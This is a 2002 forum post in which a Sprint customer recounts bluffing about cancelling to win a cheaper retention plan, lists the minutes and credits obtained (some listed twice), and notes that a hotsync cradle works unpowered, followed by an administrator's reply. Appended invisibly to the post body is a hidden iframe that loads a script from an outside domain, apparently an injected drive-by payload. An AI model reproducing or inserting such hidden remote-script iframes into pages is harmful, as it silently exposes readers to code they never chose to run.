+ Reply to Thread

Talking Sprint retention - STILL wheelin' & dealin'

I reviewed some posts from previous threads, and noticed that a lot of people were getting "retention plans" while I sit back and get reamed for $59.99 a month + equpment replacement + tax = $73.00 in the state of WA.

Oouch, thats been hurting.
    I decided to call and "cancel".. I've had my service turned off numerous times, and had to speak to collections.. Which aren't even Sprint employees, would actually hang up on me (yes, they'd say "ok sir, one moment" and then hang up.
    OR "Can you hold for one moment?"... then about 5 minutes later a CSR comes on asking me what my phone number is... this meaning i've been cold X-ferred right back into the call Q.
    err.

So anyways, I had to keep the lady on the phone for an hour to get all of the right options out of her, and at first she said she couldn't do first incoming minute free, and she couldn't give me 150 bonus minutes.. hehe.. you gotta really work it into 'em for them to respond.
    Anyway, this is what I got.

* 500 + bonus 150 = 650 peak minutes per month
    * 1000 + bonus 2000 = 3000 - 8pm-7am off peak minutes
    * First incoming minute free
    * Wireless web INCLUDED.. (woohoO!)
    * 30 Cents per minute (Overage)
    * 60 addt'l peak minutes - will roll over each cycle for up to 6 months

AND

* One month service credit! Will be effective next billing cycle for a $59.95 reduction, which essentially gives me THIS MONTH free.

* 60 courtesy peak minutes - will roll over each cycle for up to 6 months

AND

* One month service credit! Will be effective next billing cycle for a $59.95 reduction, which essentially gives me THIS MONTH free.

She said she's never heard of 0 deductible equipment coverage, and that remains at $4. I forgot to ask about PCS-PCS minutes.

Total cost: $35.99 (Plus tax & $4 equipment replcmnt)

SURE BEATS $75 a month!!!!!!!!!!!!!!!

Thanks for posting that stuff guys! This is great!

By the way, You guys know that the desktop charger / hotsync cradle is able to be used for serial data transfer purposes WITHOUT being plugged in to an outlet?

Yes, you can take this with you in your car, and it will transfer data for internet or hotsync, however it obviously will be running off the i300's battery, so you may need an extra battery or car charger.

Oh, and I was bluffing the whole time about cancelling, I started my contract in Febuary. So I had plenty of time left at $60 a month. I did however have to renew for 1 year when the retention plan was added.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    Last edited by thend9; 08-03-2002 at 10:43 AM.

Administrator

Arrow

By the way, You guys know that the desktop charger / hotsync cradle is able to be used for serial data transfer purposes WITHOUT being plugged in to an outlet?
    umm yes we knew.. some of us dont want to lug thje cradle around when mobile, thats why the sync cable was born!